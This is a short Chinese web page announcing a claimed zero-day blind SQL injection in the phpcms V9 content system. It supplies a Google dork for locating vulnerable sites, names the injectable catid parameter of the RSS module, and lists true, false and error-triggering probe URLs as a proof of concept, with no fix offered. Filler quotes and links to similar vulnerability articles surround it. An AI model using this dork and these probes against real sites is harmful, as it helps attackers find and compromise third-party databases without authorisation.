phpcms V9 BLind SQL 注入漏洞0day

智者创造机会,强者把握机会,弱者坐等机会。才能是来自独创性。独创性是思维观察明白和决定的一种独特的方式。

  影响版本:phpcms v9 blind

  官方网站:http://www.phpcms.cn

  漏洞类型:SQL注入

  漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

  google dork:inurl:"index.php?m=content+c=rss+catid=10"

  exploit & p0c

  [!] index.php?m=content&c=rss&catid=[valid catid]

  Example p0c

  [!] http://host/index.php?m=content&c=rss&catid=10 <= True

  [!] http://host/index.php?m=content&c=rss&catid=-10 <= False

  [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

 

本文phpcms V9 BLind SQL 注入漏洞0day到此结束。你笑,我就可以高兴好几天;可看你哭,我就难过了好几年。小编再次感谢大家对我们的支持!

您可能有感兴趣的文章
中关村在线博客子站SQL注入及修复方案

管家婆软件官方网存在SQL注射及弱口令的漏洞分析

傲游浏览器官网存在SQL注射漏洞分析

Mysql身份认证漏洞的分析以及如何利用

金山毒霸多个sql注入及XSS漏洞和修复